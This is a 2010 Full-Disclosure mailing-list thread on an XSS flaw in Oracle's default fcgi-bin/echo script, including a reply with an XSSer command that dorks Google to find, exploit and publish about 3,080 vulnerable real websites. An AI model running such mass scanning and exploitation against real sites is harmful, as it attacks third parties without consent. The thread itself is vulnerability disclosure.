Re: XSS in Oracle default fcgi-bin/echo
From: psy <root () lordepsylon net>
Date: Fri, 08 Oct 2010 16:16:47 +0200
Maybe with an FD PoC they will decide to fix it.
Detecting, exploiting and reporting the "fcgi-bin/echo" Oracle vulnerability
with XSSer (http://xsser.sf.net)
./XSSer -d "'inurl:fcgi-bin/echo'" --De "google" --proxy "http://127.0.0.1:8118" -s --publish
Results of the botnet attack in real time:
Reported: approx. 3,080 vulnerable websites.
On 10/08/2010 12:18 AM, paul.szabo () sydney edu au wrote:
Many Oracle web server installations have a fcgi-bin/echo script
left over from default demo (google for inurl:fcgi-bin/echo). That
script seems vulnerable to XSS. (PoC exploit and explanation of
impact withheld now.)
I asked security () oracle com and they said that "... this issue has
been resolved in an earlier Critical Patch Update."
They said the same to me one year ago.
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/